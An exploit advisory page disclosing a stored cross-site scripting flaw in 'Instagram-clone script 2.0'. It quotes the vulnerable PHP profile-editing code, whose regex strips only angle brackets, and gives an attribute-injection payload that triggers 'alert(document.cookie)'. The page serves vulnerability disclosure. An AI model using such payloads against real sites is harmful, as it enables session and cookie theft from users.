Instagram-clone script 2.0 - Persistent cross site scripting

2018.07.08
Credit: L0RD
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Instagram-clone script 2.0 - Persistent cross site scripting # Date: 2018-07-08 # Exploit Author: L0RD # Email: borna.nematzadeh123@gmail.com # Software Link: https://github.com/yTakkar/Instagram-clone/archive/master.zip # Vendor Homepage: https://github.com/yTakkar/Instagram-clone # Version: 2.0 # Tested on: Kali linux ================================================= # POC : Persistent Cross site scripting # vulnerable file : edit_requests.php # vulnerable code : if (isset($_POST['username'])) { $username = preg_replace("#[<> ]#i", "", $_POST['username']); $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']); $surname = preg_replace("#[<> ]#i", "", $_POST['surname']); $bio = preg_replace("#[<>]#i", "", $_POST['bio']); $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']); $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']); $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']); $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']); $website = preg_replace("#[<>]#i", "", $_POST['website']); $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']); $tags = preg_replace("#[\s]#", "-", $_POST['tags']); $session = $_SESSION['id']; $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio, $instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags); $array = array("mssg" => $m); echo json_encode($array); } # preg_replace() function replaces "<>" with null. So we use this payload to bypass regex : # Payload : "onmouseover=" alert(document.cookie) =================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top